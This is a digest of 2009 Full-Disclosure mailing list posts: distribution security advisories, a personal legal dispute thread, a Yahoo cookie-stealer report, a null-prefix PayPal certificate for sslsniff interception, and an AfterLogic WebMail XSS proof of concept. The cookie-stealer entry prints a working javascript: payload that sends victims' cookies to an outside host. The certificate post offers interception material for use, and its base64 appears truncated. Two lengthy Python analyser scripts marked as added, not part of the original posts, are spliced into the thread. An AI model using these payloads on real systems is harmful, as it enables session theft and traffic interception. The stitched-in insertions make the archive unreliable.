Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-10-05 Thread laurent gaffie
More explication on cve-2009-3103

http://g-laurent.blogspot.com/2009/10/more-explication-on-cve-2009-3103.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (No subject) legal threat from Alyse Auernheimer

2009-10-05 Thread TheLearner
Sorry about leaving sealpac in there, we're working on correcting 
that. I'll put a notice in the next one.

For the record, the post made in an earlier version of Andrew 
Auernheimer's infodoc states weev has an affiliation with sealpac. 
This is incorrect because weev just took the domain name and failed 
to give it back.

Since you find it necessary to forward this correspondence to the 
FBI, I'll make it public here for you.

It's almost like you're fishing to be a victim or something. It's 
pathetic.

If it means anything: No one has made any threats to you. No one is 
going to harm you. No one has any ill-sentiment towards your family.

You've been done a favor by having your relationship with weev 
clarified on here.

You got your correction, you got your post down, quit being 
melodramatic.

On Mon, 05 Oct 2009 07:50:20 + Alyse Auernheimer 
designadventu...@gmail.com wrote:
Return-Path: designadventu...@gmail.com
Received: from smtp7.hushmail.com (smtp7.hushmail.com 
[65.39.178.136])
 by imap12.hushmail.com (Cyrus v2.3.7-Invoca-RPM-2.3.7-2.el5) with 
LMTPA;
 Mon, 05 Oct 2009 07:50:29 +
X-Sieve: CMU Sieve 2.3
Received: from mail-ew0-f224.google.com (mail-ew0-f224.google.com 
[209.85.219.224])
by smtp7.hushmail.com (Postfix) with ESMTP
for mrxisapl...@hush.com; Mon,  5 Oct 2009 07:50:21 + (UTC)
Received: by ewy24 with SMTP id 24so11122764ewy.22
for mrxisapl...@hush.com; Mon, 05 Oct 2009 00:50:21 -0700 
(PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=gmail.com; s=gamma;
h=domainkey-signature:mime-version:received:date:message-
id:subject
 :from:to:content-type;
bh=O+UD/WD8lCH2KA1S8ZiYbDmjoHo36/uRUHWULElbv7c=;

b=N9iZNiKyHiM6Sso//SeBju/siqip/Kl3QGZ1kBFI6HY0Npx0TU4suw4PixASzY5EdO
 
Mfq8Gc6SEQAaPBmtRv+EPoCENWkaKMg21oRkzgaCwZ90QFnfu7K/H4mfuZHkXehS9irP
 XL273nm8NSog6o7XfyATtsN+2TVdFvwYC6B0w=
DomainKey-Signature: a=rsa-sha1; c=nofws;
d=gmail.com; s=gamma;
h=mime-version:date:message-id:subject:from:to:content-type;

b=HfCFSLplV0dZpvp5Pmk5aqBRGbsW4KwixRJ0KmZHItZhIJkeVGLWeHMPqyBtE3nkg5
 
4XlDiotqE/V0398MMiRyzreqiHrufXjkTdzAYnK1KBHA1pBje2dtlM6l/ICwS+fuLiLt
 9HubIoKXLS126A9FQOYCxML9lQ1qG/DdROv8I=
MIME-Version: 1.0
Received: by 10.216.87.144 with SMTP id 
y16mr622378wee.95.1254729020908; Mon, 
05 Oct 2009 00:50:20 -0700 (PDT)
Date: Mon, 5 Oct 2009 03:50:20 -0400
Message-ID: 
4f8170520910050050v1d44b4d8p6ad4202ac4dc5...@mail.gmail.com
Subject: 
From: Alyse Auernheimer designadventu...@gmail.com
To: TheLearner mrxisapl...@hush.com
Content-Type: multipart/alternative; 
boundary=0016e6d7852e94a5d104752b5dda

Lisa,
Please do not link Andrew Auernheimer with our business, Sealpac 
USA, he has
nothing to do with it except he is holding our domain name hostage. 
We are
planning on pursuing a court order to have it released. All of our 
emails
concerning this subject will now be forwarded to the FBI as it may
potentially impact our business. The individuals who say they are 
trying to
help us are now causing more harm to us than Andrew himself. We are 
advised
to have our home watched by law enforcement and our daughter's 
dorm. This is
just wrong.

Thank you for your consideration.
Alyse



[Full-disclosure] [SECURITY] [DSA 1901-1] New mediawiki1.7 packages fix several vulnerabilities

2009-10-05 Thread Giuseppe Iuculano
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- 
Debian Security Advisory DSA-1901-1  secur...@debian.org
http://www.debian.org/security/  Giuseppe Iuculano
October 05, 2009   http://www.debian.org/security/faq
- 

Package: mediawiki1.7
Vulnerability  : several vulnerabilities
Problem type   : remote
Debian-specific: no
CVE IDs: CVE-2008-5249 CVE-2008-5250 CVE-2008-5252 CVE-2009-0737
Debian Bugs: 508868 508869 508870 514547


Several vulnerabilities have been discovered in mediawiki1.7, a website engine
for collaborative work. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2008-5249

David Remahl discovered that mediawiki1.7 is prone to a cross-site scripting 
attack.

CVE-2008-5250

David Remahl discovered that mediawiki1.7, when Internet Explorer is used and
uploads are enabled, or an SVG scripting browser is used and SVG uploads are
enabled, allows remote authenticated users to inject arbitrary web script or
HTML by editing a wiki page.

CVE-2008-5252

David Remahl discovered that mediawiki1.7 is prone to a cross-site request
forgery vulnerability in the Special:Import feature.

CVE-2009-0737

It was discovered that mediawiki1.7 is prone to a cross-site scripting attack in
the web-based installer.


For the oldstable distribution (etch), these problems have been fixed in version
1.7.1-9etch1 for mediawiki1.7, and mediawiki is not affected (it is a
metapackage for mediawiki1.7).

The stable (lenny) distribution does not include mediawiki1.7, and these
problems have been fixed in version 1:1.12.0-2lenny3 for mediawiki which was
already included in the lenny release.

The unstable (sid) and testing (squeeze) distributions do not
include mediawiki1.7, and these problems have been fixed in version 1:1.14.0-1
for mediawiki.


We recommend that you upgrade your mediawiki1.7 packages.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1-9etch1.dsc
Size/MD5 checksum:  911 7db727bfa3f6139e107af451a90df719
  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1.orig.tar.gz
Size/MD5 checksum:  3256428 50b74e2b5c86fb94c7201b72d2037662
  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1-9etch1.diff.gz
Size/MD5 checksum:46880 f939cc99afd3ff4b330a35ce549fdd7e

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7_1.7.1-9etch1_all.deb
Size/MD5 checksum:  3341486 4d801e5ee141c2affd080437cafa7f0f

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_alpha.deb
Size/MD5 checksum:   180506 526bd0d52438515635abc44afea9e618

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_amd64.deb
Size/MD5 checksum:   137638 b63b1cd4bc45683507e765b5af1aea12

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_arm.deb
Size/MD5 checksum:   140018 a9431b5e427703486a814ed2a7442d62

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_hppa.deb
Size/MD5 checksum:42988 0a7a434f0fcc81b7d8d5e80137ca6569

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_i386.deb
Size/MD5 checksum:   122238 cc04873698abdbf03011336f533c2b06

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_ia64.deb
Size/MD5 checksum:   231730 e3201066e1de24dc9a13d284ea4b685f

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/m/mediawiki1.7/mediawiki1.7-math_1.7.1-9etch1_mips.deb
Size/MD5 checksum:42978 e92b925866416643905a835ab0a5ae2b

mipsel architecture (MIPS (Little Endian))

  

[Full-disclosure] Yahoo cookie stealer

2009-10-05 Thread Pasca
Found in the wild:
http://funny.byethost16.com

Redirects to:
http://kr.gugi.yahoo.com/myBook/myregion.php?func_mode=loginActiontargetUrl=javascript:document.location=String.fromCharCode(104,116,116,112,58,47,47,102,117,110,110,121,46,98,121,101,116,104,111,115,116,49,54,46,99,111,109,47,105,110,100,101,120,46,112,104,112,63,105,115,114,61).concat(escape(document.cookie));


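An added example, not part of Pasca's post: a small Python analyser of the kind an incident responder would run over a reported redirect URL. It decodes every String.fromCharCode(...) literal, so the real destination is readable instead of a list of numbers, and flags query parameters whose value is a javascript: URL that reads document.cookie, which is the cookie-theft pattern above. The sample URL is the one reported in the post; the '&' between func_mode and targetUrl is assumed (the archive copy lost it), and the function names are mine.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample: the redirect reported in the post.  The '&' between the
# two query parameters is assumed; the archive copy lost it.
SAMPLE_URL = (
    "http://kr.gugi.yahoo.com/myBook/myregion.php?func_mode=loginAction"
    "&targetUrl=javascript:document.location=String.fromCharCode("
    "104,116,116,112,58,47,47,102,117,110,110,121,46,98,121,101,116,104,111,"
    "115,116,49,54,46,99,111,109,47,105,110,100,101,120,46,112,104,112,63,"
    "105,115,114,61).concat(escape(document.cookie));"
)

# Matches String.fromCharCode(104,116,...) and captures the number list.
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")


def _codes(match) -> str:
    """Turn the captured '104,116,...' list into the string it builds."""
    codes = [int(c) for c in match.group(1).split(",") if c.strip()]
    return "".join(chr(c) for c in codes)


def decode_charcode_calls(script: str) -> List[str]:
    """Return the literal each String.fromCharCode(...) call in `script` builds."""
    return [_codes(m) for m in FROMCHARCODE.finditer(script)]


def deobfuscate(script: str) -> str:
    """Rewrite the script with every fromCharCode call replaced by a quoted
    literal, so an analyst reads the destination host directly."""
    return FROMCHARCODE.sub(lambda m: repr(_codes(m)), script)


def analyse_redirect(url: str) -> List[Dict[str, object]]:
    """Inspect each query parameter of a redirect-style URL and report those
    whose value is a javascript: URL: what it decodes to and whether it
    touches document.cookie."""
    findings: List[Dict[str, object]] = []
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            value = unquote(value).strip()
            if not value.lower().startswith("javascript:"):
                continue
            findings.append({
                "parameter": name,
                "decoded_literals": decode_charcode_calls(value),
                "reads_cookie": "document.cookie" in value,
                "deobfuscated": deobfuscate(value),
            })
    return findings


if __name__ == "__main__":
    for finding in analyse_redirect(SAMPLE_URL):
        print(f"{finding['parameter']}: javascript: URL, "
              f"reads cookie={finding['reads_cookie']}")
        print("  decoded:", finding["deobfuscated"])
```

The check is deliberately narrow: a redirect parameter that carries a javascript: URL is the thing to alert on, and the decoded literal tells the responder which host receives the stolen cookies.
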

[Full-disclosure] [SECURITY] [DSA 1902-1] New elinks packages fix arbitrary code execution

2009-10-05 Thread Moritz Muehlenhoff
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- 
Debian Security Advisory DSA-1902-1  secur...@debian.org
http://www.debian.org/security/   Moritz Muehlenhoff
October 05, 2009  http://www.debian.org/security/faq
- 

Package: elinks
Vulnerability  : buffer overflow
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)  : CVE-2008-7224
Debian Bug : 380347

Jakub Wilk discovered an off-by-one buffer overflow in the charset 
handling of elinks, a feature-rich text-mode WWW browser, which might
lead to the execution of arbitrary code if the user is tricked into
opening a malformed HTML page.

For the old stable distribution (etch), this problem has been fixed in
version 0.11.1-1.2etch2.

The stable distribution (lenny) and the unstable distribution (sid)
already contain a patch for this problem.

We recommend that you upgrade your elinks package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2.diff.gz
Size/MD5 checksum:30564 48727476dbfed45200797a0504fa6e4a
  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1.orig.tar.gz
Size/MD5 checksum:  3863617 dce0fa7cb2b6e7194ddd00e34825218b
  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2.dsc
Size/MD5 checksum:  872 870acbbc16c166c0e17669f435cf4478

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_alpha.deb
Size/MD5 checksum:   496748 65a9e90caf0005912d0f307447bb7252
  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_alpha.deb
Size/MD5 checksum:  1264746 750b9c9425d331afdd84ae9e8ec397cc

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_amd64.deb
Size/MD5 checksum:   457658 d35d0729240a9a3e4edf596fab8b5519
  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_amd64.deb
Size/MD5 checksum:  1219062 eeb677af4bd1f969062dcc49a6c5797f

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_arm.deb
Size/MD5 checksum:  1179258 2236eef0018c35106157254f1a9b5371
  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_arm.deb
Size/MD5 checksum:   417026 d6298439e61cfd390dc5f885fa6d3ce9

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_hppa.deb
Size/MD5 checksum:  1249718 200ea460bf1c50c7c77fb818b99d6f93
  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_hppa.deb
Size/MD5 checksum:   481296 4d1ffd49415dc0f727fec71843e0cf1e

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_i386.deb
Size/MD5 checksum:   423782 fd2bdd5f8d85049dd34e9d392cfb0d55
  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_i386.deb
Size/MD5 checksum:  1188386 6b5bd5cc0801cc98c5f89eb755036a58

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_ia64.deb
Size/MD5 checksum:  1432996 3f1c8fd354685e153aa0bf6001811f72
  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_ia64.deb
Size/MD5 checksum:   624264 6ab1d3d6329c2fbbd366c7979846be04

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_mipsel.deb
Size/MD5 checksum:  1223924 88dab6a6625382e7d7531f9f45f2fb6d
  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_mipsel.deb
Size/MD5 checksum:   466916 3f54531dc562935768748e8626c3cd8a

powerpc architecture (PowerPC)

  
http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.11.1-1.2etch2_powerpc.deb
Size/MD5 checksum:   450082 4cb3cbeda69cd02ddc99b132d26998c5
  
http://security.debian.org/pool/updates/main/e/elinks/elinks_0.11.1-1.2etch2_powerpc.deb
Size/MD5 checksum:  1216856 ed85e75381a7bfdd094e21e0e16ecbfd

s390 architecture (IBM 

[Full-disclosure] null-prefix certificate for paypal

2009-10-05 Thread Tim Jones


If there's really a Moxie Marlinspike fan club [1], I'm definitely a member.  
Attached is one of the null-prefix certificates [2] that he distributed during 
his intercepting secure communication training at Black Hat.  This one's for 
www.paypal.com, and since the Microsoft crypto api appears to remain unpatched, 
it works flawlessly with sslsniff [3] against all clients on Windows (IE, 
Chrome, Safari).  Also, because of Moxie's attacks against OCSP [4], I don't 
think this certificate can be revoked.

Enjoy!

[1]: http://www.linuxtoday.com/security/2009100102035NWNT
[2]: http://www.thoughtcrime.org/papers/null-prefix-attacks.pdf
[3]: http://www.thoughtcrime.org/software/sslsniff/
[4]: http://www.thoughtcrime.org/papers/ocsp-attack.pdf

-----BEGIN CERTIFICATE-----
MIIGRDCCBa2gAwIBAgIDAPCbMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC
RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD
VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl
Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3
DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwMjI0MjMwNDE3WhcNMTEwMjI0
MjMwNDE3WjCBlDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU
BgNVBAcTDVNhbiBGcmFuY2lzY28xETAPBgNVBAoTCFNlY3VyaXR5MRQwEgYDVQQL
EwtTZWN1cmUgVW5pdDEvMC0GA1UEAxMmd3d3LnBheXBhbC5jb20Ac3NsLnNlY3Vy
ZWNvbm5lY3Rpb24uY2MwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANJp+m86
ALQhG8ixAtc/GbLEbbRU+IuKzNtywp48YLnGkT2Ct32Z/9EphMFzU5yC3fwkjHfV
QfPoHkKhrS2e/1sQJs6dVxdzFiM4yNbxuqOWWxZnSk9zlzpNFKT04j+LBYNC0dDc
L3rlthCyEcDcISqQ/66XcVpJgaxA8zu4WbJPAgMBAAGjggMhMIIDHTAJBgNVHRME
AjAAMBEGCWCGSAGG+EIBAQQEAwIGQDALBgNVHQ8EBAMCA/gwEwYDVR0lBAwwCgYI
DmGN2h0dHA6Ly93d3diYWNrLmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBz
Y2EyMDAyQ0xBU0VBMS5jcmwwMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzABhhZo
dHRwOi8vb2NzcC5pcHNjYS5jb20vMA0GCSqGSIb3DQEBBQUAA4GBAGjueZeX3Tvv
FmoG8hSabs2eEveqgxC90XyY+seu1A4snjgFnVJgqZkKgbSYkB2uu0rXudyInjd4
QVv3gqXyukElWpAaHkU4oVJYdZQmRPsgB7pEzOVKLXI/mEf2JtwFRgUHYyGrRpuc
eNVUWz0MHshkjLVQI4Jv27giHEOWB6i7
-----END CERTIFICATE-----

-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----


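An added example, not part of Tim Jones's post and not code from sslsniff: it decodes the subject CN straight out of the base64 of the certificate above (the fragment spanning "...AxMmd3d3LnBheXBhbC5jb20Ac3NsLnNlY3Vy" and "ZWNvbm5lY3Rpb24uY2M...", padded with '=' so it decodes alone), shows what a validator that treats the CN as a C string sees, and puts a length-aware hostname check next to it that rejects the NUL. Function names and the wildcard handling are mine; the certificate bytes are the post's.

```python
import base64

# Subject CN of the certificate posted above, copied from its PEM.  The
# trailing '=' pads the fragment so it decodes on its own.
CN_FRAGMENT_B64 = "d3d3LnBheXBhbC5jb20Ac3NsLnNlY3VyZWNvbm5lY3Rpb24uY2M="

# Characters a hostname pattern may contain ('*' only for a wildcard label).
ALLOWED = set("abcdefghijklmnopqrstuvwxyz0123456789-.*")


def posted_cn() -> bytes:
    """Raw CN bytes of the posted certificate; note the NUL in the middle."""
    return base64.b64decode(CN_FRAGMENT_B64)


def c_string_view(cn: bytes) -> str:
    """What a validator sees when it hands the CN to C string routines:
    everything up to the first NUL.  This is the defect the post relies on."""
    return cn.split(b"\x00", 1)[0].decode("ascii", "replace")


def naive_matches(cn: bytes, hostname: str) -> bool:
    """Vulnerable comparison: the NUL-truncated CN against the expected host."""
    return c_string_view(cn).lower() == hostname.lower()


def strict_matches(cn: bytes, hostname: str) -> bool:
    """Length-aware comparison: every byte of the CN must be a hostname
    character, so a NUL (or any other control byte) fails outright.  One
    leading '*' label is honoured as a wildcard in the way RFC 6125 allows."""
    try:
        pattern = cn.decode("ascii").lower()
    except UnicodeDecodeError:
        return False
    if not pattern or any(ch not in ALLOWED for ch in pattern):
        return False
    host = hostname.lower()
    if "*" not in pattern:
        return pattern == host
    # Wildcard only as the whole left-most label, and only with at least two
    # labels to its right, so '*.com' can never match anything.
    if (not pattern.startswith("*.") or "*" in pattern[1:]
            or pattern.count(".") < 2):
        return False
    first, _, rest = host.partition(".")
    return bool(first) and rest == pattern[2:]


if __name__ == "__main__":
    cn = posted_cn()
    print("CN bytes:      ", cn)
    print("C-string view: ", c_string_view(cn))
    print("naive match for www.paypal.com: ", naive_matches(cn, "www.paypal.com"))
    print("strict match for www.paypal.com:", strict_matches(cn, "www.paypal.com"))
```

The point of the strict check is that the byte length of the CN, not the position of the first NUL, decides how much of it is compared; any TLS client that derives the comparison length from a NUL terminator accepts this certificate for www.paypal.com.
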
[Full-disclosure] [USN-841-1] GLib vulnerability

2009-10-05 Thread Kees Cook
===
Ubuntu Security Notice USN-841-1   October 05, 2009
glib2.0 vulnerability
CVE-2009-3289
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  libglib2.0-0                    2.16.6-0ubuntu1.2

Ubuntu 8.10:
  libglib2.0-0                    2.18.2-0ubuntu2.2

Ubuntu 9.04:
  libglib2.0-0                    2.20.1-0ubuntu2.1

After a standard system upgrade you need to restart your session to effect
the necessary changes.

Details follow:

Arand Nash discovered that applications linked to GLib (e.g. Nautilus)
did not correctly copy symlinks.  If a user copied symlinks with GLib,
the symlink target files would become world-writable, allowing local
attackers to gain access to potentially sensitive information.


Updated packages for Ubuntu 8.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.16.6-0ubuntu1.2.diff.gz
  Size/MD5:36482 5a747f19839228824de8b801306697b1

http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.16.6-0ubuntu1.2.dsc
  Size/MD5: 1168 b073d48a3ef03f58d58a647ba6bc5152

http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/glib2.0_2.16.6.orig.tar.gz
  Size/MD5:  6491460 65c594a471406a377bee8171a2ea43d4

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-doc_2.16.6-0ubuntu1.2_all.deb
  Size/MD5:  1131446 3554e3c1d7ff9e967b2a70118ed269d0

http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-data_2.16.6-0ubuntu1.2_all.deb
  Size/MD5:  968 8b2ba86fa2ce1c1ce6f87449a29ba398

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_amd64.deb
  Size/MD5:  1177628 74b9bb38332276d8f27e84a2a989923c

http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_amd64.deb
  Size/MD5:   824766 5d60a5bbee4bb5f5a503cf17b6b968d8

http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_amd64.deb
  Size/MD5:   985446 30a551102c0dc05911b28d18f09094e2

http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_amd64.deb
  Size/MD5:48396 5fbd8935fc8cdfbc87ddee9dd5ea906e

http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_amd64.udeb
  Size/MD5:  1307488 0e797f76924ae31a0a54f596207c1c18

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_i386.deb
  Size/MD5:  1102278 322adce90ad9052eb05e97acb2bb3aed

http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_i386.deb
  Size/MD5:   758442 d60d1a00d850acc2bf29301d2e708c94

http://security.ubuntu.com/ubuntu/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_i386.deb
  Size/MD5:   872458 21872fd8706eccc3260906e9e18b81f6

http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_i386.deb
  Size/MD5:46706 5e4456b1527efd940e01c7aca7c65072

http://security.ubuntu.com/ubuntu/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_i386.udeb
  Size/MD5:  1241052 ca6659a5062d06e9f95a794d25aa0bec

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_lpia.deb
  Size/MD5:  1126498 a8cf538453e395b610fd43a0e1d3995c

http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_lpia.deb
  Size/MD5:   749728 b8ab5b52627b33a02dc628518f6e8cc1

http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_lpia.deb
  Size/MD5:   866292 d24055f7c9b3c22743b23b1db647f8c8

http://ports.ubuntu.com/pool/universe/g/glib2.0/libgio-fam_2.16.6-0ubuntu1.2_lpia.deb
  Size/MD5:46612 7b5d6df79a5cc8a2a776b0c67b30a889

http://ports.ubuntu.com/pool/universe/g/glib2.0/libglib2.0-udeb_2.16.6-0ubuntu1.2_lpia.udeb
  Size/MD5:  1232302 fafbeb120762dfb6b82d401106729d21

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0-dbg_2.16.6-0ubuntu1.2_powerpc.deb
  Size/MD5:  1166088 050d4dd8978470c1093993d6c90e596a

http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-0_2.16.6-0ubuntu1.2_powerpc.deb
  Size/MD5:   825162 ecffe44dd39ccfd545503ca4a71fa7e0

http://ports.ubuntu.com/pool/main/g/glib2.0/libglib2.0-dev_2.16.6-0ubuntu1.2_powerpc.deb
  Size/MD5:  1033488 700541c029701259dd63002d839e6b58


[Full-disclosure] Advisory: Cross-Site Scripting flaw in AfterLogic WebMail Pro

2009-10-05 Thread Sébastien Duquette
Security Advisory : Cross-Site Scripting flaw in AfterLogic WebMail Pro

Description
-
AfterLogic WebMail Pro is vulnerable to Cross-Site Scripting, allowing injection
of malicious code in the context of the application.

Overview
---
Quote from http://www.afterlogic.com/products/webmail-pro :
Webmail front-end for your existing POP3/IMAP mail server. Offer your users
the fast AJAX webmail and innovative calendar with sharing. Stay in control
with the admin panel and the developer's API.

Details

Vulnerable Product : AfterLogic WebMail Pro <= 4.7.10
Vulnerability Type : Cross-Site Scripting (XSS)
Affected page : history-storage.aspx
Vulnerable parameters : HistoryKey, HistoryStorageObjectName
Discovered by :
Sébastien Duquette (http://intheknow-security.blogspot.com)
Gardien Virtuel (www.gardienvirtuel.com)
Original Advisory :
http://www.gardienvirtuel.com/fichiers/documents/publications/GVI_2009-01_EN.txt

Timeline
--
Bug Discovered : September 18th, 2009
Vendor Advised : September 23rd, 2009
Fix made available : September 30th, 2009

Proof of concept
---
The targeted user must be logged in to the webmail. This proof of concept was
successfully tested in Firefox 3.5 and Internet Explorer 8.

<html>
<head>
</head>
<body onLoad="document.form1.submit()">
<form name="form1" method="post"
action="http://WEBSITE/history-storage.aspx?param=0.21188772204998574";
onSubmit="return false;">
<input type="hidden" name="HistoryKey" value="value"/>
<input type="hidden" name="HistoryStorageObjectName" value="location;
alert('xss'); //"/>
</form>
</body>
</html>

Solution
-
The vendor has made available a patched version. Update to AfterLogic
WebMail Pro 4.7.11.
